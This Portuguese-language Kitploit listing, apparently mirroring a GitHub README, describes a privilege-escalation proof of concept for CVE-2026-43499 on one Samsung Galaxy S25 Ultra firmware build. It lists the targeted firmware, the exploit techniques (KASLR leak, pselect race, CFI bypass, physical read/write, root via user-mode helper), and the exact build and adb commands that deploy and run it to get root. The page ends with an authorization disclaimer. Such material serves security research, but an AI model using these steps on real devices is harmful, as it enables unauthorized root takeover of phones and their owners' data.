Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-43499-S25U — PoC independente para CVE-2026-43499 do Galaxy S25 Ultra SM-S938N S938NKSUACZF1 | Kitploit
Ferramentas/GitHubGitHub/busung-dev/cve-2026-43499-s25u
Segurança AndroidEscalada de PrivilégiosExploraçãoPós-ExploraçãoRed TeamingDesenvolvimento de PayloadsExploração de Binários
GitHubbusung-dev/cve-2026-43499-s25u

CVE-2026-43499-S25U

PoC independente para CVE-2026-43499 do Galaxy S25 Ultra SM-S938N S938NKSUACZF1

Ver Repositório
39103há 1 mêsRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC para CVE-2026-43499 no Galaxy S25 Ultra

Prova de conceito específica do dispositivo para CVE-2026-43499 no Samsung Galaxy S25 Ultra coreano.

Alvo suportado

root@kitploit:~
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages

Os offsets e layouts de estrutura são válidos apenas para o firmware acima.

Referência

Este port é baseado em:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • Revisão upstream: b850d3bddc74c3328d5fbcc0568d21962b55d949

A licença Apache 2.0 upstream é mantida em LICENSE.

Alterações do port

  • Adicionados os offsets e layouts do kernel pa3q-S938NKSUACZF1.
  • Adicionada recuperação de slide KASLR baseada em tracefs para este kernel Samsung.
  • Portado o race do pselect, estágio CFI/FOPS e primitiva de leitura/escrita física.
  • Adicionado o caminho root do user-mode-helper system_unbound_wq específico do dispositivo.
  • Adicionados processos de retry isolados com a sequência de atraso pselect ajustada ao dispositivo.
  • Retém páginas recuperadas após o sucesso para evitar reciclar objetos forjados vivos.

Compilação

Defina ANDROID_NDK_HOME para Android NDK r29 ou um toolchain compatível:

root@kitploit:~
make -j8

Saídas:

root@kitploit:~
build/cve-2026-43499
build/cve-2026-43499-root

Implantação e execução

root@kitploit:~
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

O exploit padrão usa 16 tentativas independentes e um atraso base de pselect de 20.000 microssegundos. Substitua-os ao coletar dados de temporização:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"

A sessão root temporária e as alocações retidas duram até a reinicialização.

Para instalação com um clique e suporte ao KernelSU, use Root My Galaxy.

Use apenas em dispositivos que você possui ou para os quais tem autorização explícita para testar.

Baixar ferramenta